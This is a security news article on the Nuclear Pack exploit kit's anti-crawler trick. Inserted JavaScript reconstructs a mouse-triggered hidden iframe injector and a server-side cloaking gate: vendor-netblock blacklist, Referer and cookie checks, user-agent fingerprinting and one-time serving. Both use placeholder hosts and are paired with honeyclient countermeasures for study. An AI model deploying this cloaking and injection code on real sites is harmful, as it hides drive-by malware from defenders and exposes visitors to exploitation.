Nuclear Pack exploit kit introduces anti-honeyclient crawling feature

Summary: While profiling yet another campaign serving malware and exploits, security researchers from ESET stumbled upon a new feature in the Nuclear Pack web malware exploitation kit.

For years, the security community has been developing efficient ways to evaluate the maliciousness of as many web sites as possible by crawling them for malicious content in an automated fashion. Thanks to the rise of botnets as an exploitation platform, today's cybercriminals rely largely on compromised legitimate infrastructure as the delivery vehicle for their malicious content, rather than on purely malicious sites, as their infection and propagation vector.

Naturally, cybercriminals keep track of the latest anti-malware security research, and constantly adapt to the latest innovations by introducing new features within the most widely used web malware exploitation kits.

According to security researchers from ESET, while profiling yet another campaign serving malware and exploits, they stumbled upon a new feature introduced in the Nuclear Pack web malware exploitation kit.

More details:

We have tracked some interesting activity through the injected code block with iFrame redirection: JavaScript code is used to capture mouse activity with the onmousemove event, and only after that does malicious activity continue with the redirection. This activity enabled us to identify a simple method being used to bypass crawlers used by AV companies and others. These are the first steps towards the criminals' proactive detection of real user activity for tracking detections and bypassing malware collection by whitehat crawlers.
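The mouse-gated injection ESET describes, reconstructed as an added example (this is not ESET's sample or the Nuclear Pack code): the injected script registers a mousemove handler and only creates the hidden iframe inside it, so a crawler that loads the page and dumps the DOM sees nothing. The second half shows the countermeasure a honeyclient needs, synthesising the mouse event before inspecting the DOM, plus a coarse triage regex for captured script blocks. `FakeDocument`, the landing URL and `SAMPLE_INJECT` are constructed stand-ins so the code runs under Node without a browser; in a real browser the dispatch would be `document.dispatchEvent(new MouseEvent('mousemove', {...}))` or the equivalent automation-API call.

```javascript
// Constructed stand-in for just enough of the DOM to register listeners,
// dispatch events and hold child elements. Not a real browser document.
class FakeDocument {
  constructor() {
    this.listeners = {};
    this.body = {
      children: [],
      appendChild(el) { this.children.push(el); return el; },
    };
  }
  addEventListener(type, fn) {
    if (!this.listeners[type]) this.listeners[type] = [];
    this.listeners[type].push(fn);
  }
  dispatchEvent(ev) {
    (this.listeners[ev.type] || []).forEach((fn) => fn(ev));
  }
  createElement(tag) {
    return { tagName: tag.toUpperCase(), src: '', width: null, height: null, style: '' };
  }
}

// Attacker side: the redirect is wired to mouse movement instead of page load.
// `landingUrl` is a placeholder; no real exploit-kit URL is used here.
function installGatedRedirect(doc, landingUrl) {
  let fired = false;
  doc.addEventListener('mousemove', function onMove() {
    if (fired) return; // inject the frame once per page view
    fired = true;
    const frame = doc.createElement('iframe');
    frame.src = landingUrl;
    frame.width = 0;
    frame.height = 0;
    frame.style = 'visibility:hidden';
    doc.body.appendChild(frame);
  });
}

// Naive honeyclient: load the page, then list iframe sources in the DOM.
// Against the gated injector this always returns an empty list.
function crawlNaive(doc) {
  return doc.body.children
    .filter((el) => el.tagName === 'IFRAME')
    .map((el) => el.src);
}

// Event-aware honeyclient: emulate a user moving the mouse a few times,
// then inspect the DOM. This is what turns the gated injector on.
function crawlWithSyntheticInput(doc) {
  for (let i = 0; i < 3; i++) {
    doc.dispatchEvent({ type: 'mousemove', clientX: 10 * i, clientY: 5 * i });
  }
  return crawlNaive(doc);
}

// Triage heuristic for captured script blocks: flag code that both waits for
// mouse movement and builds a frame or redirect. Coarse by design; it is a
// hint for an analyst, not a verdict.
function looksMouseGated(src) {
  const waitsForMouse = /onmousemove|addEventListener\s*\(\s*['"]mousemove['"]/i.test(src);
  const buildsRedirect =
    /createElement\s*\(\s*['"]iframe['"]|<iframe|document\.write|location\s*[.=]/i.test(src);
  return waitsForMouse && buildsRedirect;
}

// Constructed sample of an injected block following the pattern ESET
// describes. It is not a captured sample and points at a reserved domain.
const SAMPLE_INJECT =
  "document.onmousemove=function(){var f=document.createElement('iframe');" +
  "f.src='http://example.invalid/x';document.body.appendChild(f);};";

if (typeof require !== 'undefined' && require.main === module) {
  const page = new FakeDocument();
  installGatedRedirect(page, 'http://example.invalid/landing');
  console.log('naive crawl:', crawlNaive(page));
  console.log('with synthetic input:', crawlWithSyntheticInput(page));
  console.log('sample looks mouse-gated:', looksMouseGated(SAMPLE_INJECT));
}
```

The point of `crawlWithSyntheticInput` is not the three fake coordinates but the order of operations: any honeyclient that snapshots the DOM or the network log before it has generated user-like input will miss this family of injectors entirely.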

The new feature is just the tip of the iceberg. Here are some of the most common evasive techniques used by cybercriminals to prevent vendors and security researchers from analyzing their campaigns:

  • Session-based cookies, so that a request arriving without the cookie set earlier in the chain receives benign content
  • Checking the HTTP Referer header to ensure the visitor arrived through the complete exploitation chain
  • Blacklisting IP ranges (netblocks) known to belong to security vendors
  • OS and browser fingerprinting, so that exploits are served only to matching targets
  • Serving the malicious content only once for a given IP address
  • Managed iframe and JavaScript crypting/obfuscation services that dynamically generate scripts with low detection rates
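The server-side checks in that list, combined into one gate as an added example (not code from the page or from any exploit kit): each refusal carries a reason, which is exactly the information a honeyclient operator needs to know which part of a real visit the crawler failed to emulate. The vendor netblocks, cookie name, expected referring host and request objects are constructed placeholders using RFC 5737 documentation ranges and a reserved domain.

```javascript
// Constructed placeholders: in a real kit these come from the operator's panel.
const VENDOR_NETBLOCKS = ['198.51.100.0/24', '203.0.113.0/24']; // RFC 5737 ranges
const SESSION_COOKIE = 'sid';                       // set by the first hop in the chain
const EXPECTED_REFERER_HOST = 'compromised.example'; // the injected legitimate site

// IPv4 dotted quad -> unsigned 32-bit integer.
function ipToInt(ip) {
  return ip.split('.').reduce((acc, oct) => (acc << 8) + Number(oct), 0) >>> 0;
}

// True when `ip` falls inside the CIDR block `cidr` (IPv4 only).
function inCidr(ip, cidr) {
  const [net, bitsStr] = cidr.split('/');
  const bits = Number(bitsStr);
  const mask = bits === 0 ? 0 : (0xffffffff << (32 - bits)) >>> 0;
  return ((ipToInt(ip) & mask) >>> 0) === ((ipToInt(net) & mask) >>> 0);
}

// Decide whether a request gets the exploit page or a benign decoy.
// `req` is { ip, headers, cookies }; `state.served` is the set of IPs already served.
function gate(req, state) {
  // 1. Never serve into known researcher/vendor address space.
  if (VENDOR_NETBLOCKS.some((c) => inCidr(req.ip, c))) {
    return { serve: false, why: 'vendor-netblock' };
  }
  // 2. The visitor must have arrived via the injected page (Referer check).
  let refHost = null;
  try { refHost = new URL(req.headers.referer || '').hostname; } catch (e) { /* missing or malformed */ }
  if (refHost !== EXPECTED_REFERER_HOST) {
    return { serve: false, why: 'bad-referer' };
  }
  // 3. The session cookie proves the earlier hop in the chain was actually loaded.
  if (!(req.cookies && req.cookies[SESSION_COOKIE])) {
    return { serve: false, why: 'no-session' };
  }
  // 4. Coarse fingerprint: only targets the kit has exploits for (Windows here).
  if (!/Windows/.test(req.headers['user-agent'] || '')) {
    return { serve: false, why: 'fingerprint' };
  }
  // 5. One shot per IP: a second fetch from the same address gets nothing.
  if (state.served.has(req.ip)) {
    return { serve: false, why: 'already-served' };
  }
  state.served.add(req.ip);
  return { serve: true, why: 'ok' };
}

// Constructed request that passes every check: non-vendor IP, full chain,
// cookie present, Windows user agent.
function goodRequest(ip) {
  return {
    ip,
    headers: {
      referer: 'http://compromised.example/index.php',
      'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36',
    },
    cookies: { [SESSION_COOKIE]: 'c0ffee' },
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  const state = { served: new Set() };
  console.log(gate(goodRequest('198.51.100.7'), state)); // vendor-netblock
  console.log(gate({ ...goodRequest('192.0.2.10'), headers: {} }, state)); // bad-referer
  console.log(gate(goodRequest('192.0.2.10'), state)); // ok
  console.log(gate(goodRequest('192.0.2.10'), state)); // already-served
}
```

Read from the crawler's side, the order of the checks is the checklist: crawl from address space the kit will not recognise, follow the chain from the injected page rather than fetching the landing URL directly, carry cookies across hops, present a plausible victim user agent, and never re-fetch the same landing page from the same address if the first fetch is the one that counts.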

For the time being, the most widely used web malware exploitation kit remains the Black Hole exploit kit. Only time will tell whether its author will add the anti-crawling feature to the kit, but given how quickly newly released exploits are integrated into it, the feature may already be on the "to-do" list of the cybercriminal behind it.

Topics: Security, Networking


Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, and cybercrime incident response. He's been an active security blogger since 2007, and maintains a popular security blog sharing real-time threats intelligence data with the rest of the community...
